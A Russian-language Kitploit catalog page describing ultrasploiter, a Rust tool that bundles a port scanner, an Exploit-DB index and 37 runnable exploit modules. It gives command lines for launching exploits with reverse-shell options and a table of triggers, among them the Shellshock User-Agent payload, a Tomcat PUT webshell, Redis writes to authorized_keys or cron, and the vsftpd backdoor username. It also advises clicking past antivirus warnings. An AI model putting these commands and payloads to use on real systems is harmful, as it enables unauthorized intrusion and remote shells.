Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ultrasploiter — Один бинарный файл, объединяющий сканер портов, полный индекс Exploit-DB (47 тыс. записей) и исполняемые модули эксплойтов в один инструмент. Написан на Rust, работает на Linux, Windows и macOS. | Kitploit
Инструменты/GitLabGitLab/vqkro/ultrasploiter
Фреймворки для пентестаРазведкаСканеры уязвимостейФреймворки для эксплойтовКартирование сетиСканирование портовЭксплуатацияЭксплуатация веб-приложенийСбор информацииКомандование и УправлениеRed Teaming
1013 ч 8 мин назадЕщё не проверено
Разработка Полезной Нагрузки
GitLabvqkro/ultrasploiter

ultrasploiter

Один бинарный файл, объединяющий сканер портов, полный индекс Exploit-DB (47 тыс. записей) и исполняемые модули эксплойтов в один инструмент. Написан на Rust, работает на Linux, Windows и macOS.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

UltraSploiter

сканируй, сопоставляй, эксплуатируй — один IP на входе, шеллы на выходе.

Единый бинарник, объединяющий сканер портов, полный индекс Exploit-DB и набор запускаемых модулей эксплойтов в один инструмент. Работает на Linux, Windows и macOS.

задачаобычноздесь
Найти сервисы на хостеnmapUltraSploiter scan <ip>
Найти эксплойтыsearchsploitUltraSploiter search <kw>
Запустить ихmsfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter menu


Установка

Самый простой и лучший способ — просто взять готовый бинарник и запустить его. Ничего устанавливать не нужно, никаких зависимостей — один самодостаточный файл.

Скачайте со страницы релизов:

  • Windows — UltraSploiter-windows-x86_64.exe → двойной клик
  • Linux — UltraSploiter-linux-x86_64
  • macOS — готового бинарника пока нет; соберите его одной командой (ниже)

Внимание: инструменты безопасности вызывают срабатывания. Windows SmartScreen и антивирус, скорее всего, предупредят или поместят бинарник в карантин — нажмите Подробнее → Выполнить в любом случае, или добавьте исключение, если планируете его оставить.

Windows

Дважды кликните UltraSploiter.exe. Откроется меню.

Если SmartScreen предупреждает о неизвестном издателе (так и будет для любого неподписанного бинарника), нажмите Подробнее → Выполнить в любом случае.

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

Если Gatekeeper блокирует его (опять же, любой неподписанный бинарник), либо кликните правой кнопкой → Открыть, либо снимите флаг карантина один раз:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

Сборка из исходников

Нужна только если для вашей платформы нет бинарника или вы хотите его изменить. Требуется Rust 1.74+.

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1 использует тулчейн stable-x86_64-pc-windows-gnu, который линкуется с MinGW — так что вам не нужны Visual Studio или MSVC. Он устанавливает этот тулчейн, если он отсутствует. Если у вас уже есть MSVC Build Tools, обычная cargo build --release тоже сработает.

Внимание для Windows + GNU: windows-sys (подтягиваемый tokio) вызывает dlltool, который обращается к ассемблеру as — а компонент rust-mingw не поставляет as. build.ps1 ищет MinGW bin, содержащий его, в %~dp0tools\mingw64\bin и %USERPROFILE%\tools\mingw64\bin, и добавляет его в начало PATH, если находит. Положите туда сборку winlibs, если столкнётесь с error calling dlltool. Тулчейны MSVC не затронуты.


Запуск

Без аргументов вы получите меню:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

Командная строка

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

В Linux/macOS добавляйте префикс ./ (например, ./UltraSploiter scan 10.0.0.5).

Флаги сканирования

флагзначение
-p <spec>top (1000), 80,443, 1-1024, - (все)
-T0..-T5шаблон тайминга — от медленного/тихого до быстрого/шумного
-sUUDP-зондирование
-sVопределение сервиса/версии (включено по умолчанию)
--no-bannerпропустить захват баннеров
--jsonJSON в stdout
-oX <file>XML в стиле nmap

Сканер асинхронный (tokio): каждый уровень -T задаёт, сколько сокетов одновременно в работе (до 8000 при -T5), так что он покрывает top-1000 nmap за пару секунд. Каждый «открытый» — это завершённое TCP-рукопожатие, поэтому результаты точны.

Опции (-o key=value)

ключиспользуетсязначение
lhost, lportмодули rev-shellадрес обратного подключения
rportвеб-модулипереопределить HTTP-порт
pathshellshock, struts, phpunitпуть эндпоинта
user, passtomcat_managerучётные данные менеджера
coresolr_rceимя ядра Solr
filegrafana_lfiфайл для чтения
ssh_pubkeyredis_unauthключ для добавления в authorized_keys
src, dstproftpd_modcopyисточник / назначение копирования
timeoutвсетаймаут сокета в секундах

База эксплойтов

search и info опираются на полный индекс Exploit-DB — 47 000+ записей (тот же набор данных, что использует searchsploit), встроенный в бинарник. Когда запись содержит CVE, реализованный запускаемым модулем, info связывает их:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

Запускаемые модули (37)

модульCVEтриггер
vsftpd_234CVE-2011-2523имя пользователя :) → root bind shell на 6200
unrealircd_backdoorCVE-2010-2075AB; <cmd> через IRC
distcc_execCVE-2004-2687аргумент компилятора протокола DIST
proftpd_modcopyCVE-2015-3306копирование файла SITE CPFR/CPTO
redis_unauth—CONFIG SET записывает ключ или запись cron
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638OGNL в Content-Type
tomcat_putCVE-2017-12615PUT JSP-вебшелла
tomcat_manager—развернуть WAR через /manager
elasticsearch_groovyCVE-2015-1427Groovy RCE в _search
drupalgeddon2CVE-2018-7600колбэк рендеринга Form API
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000неаутентифицированный Groovy /script
solr_rceCVE-2019-17558шаблон Velocity в stream.body
grafana_lfiCVE-2021-43798чтение файла через обход пути плагина
webmin_backdoorCVE-2019-15107password_change.cgi передаёт значение в шелл
php_cgi_arg_injectionCVE-2012-1823-d auto_prepend_file через строку запроса

Каждый реализует недеструктивный check() и run().

Модули каталога (data-driven)

Скачать инструмент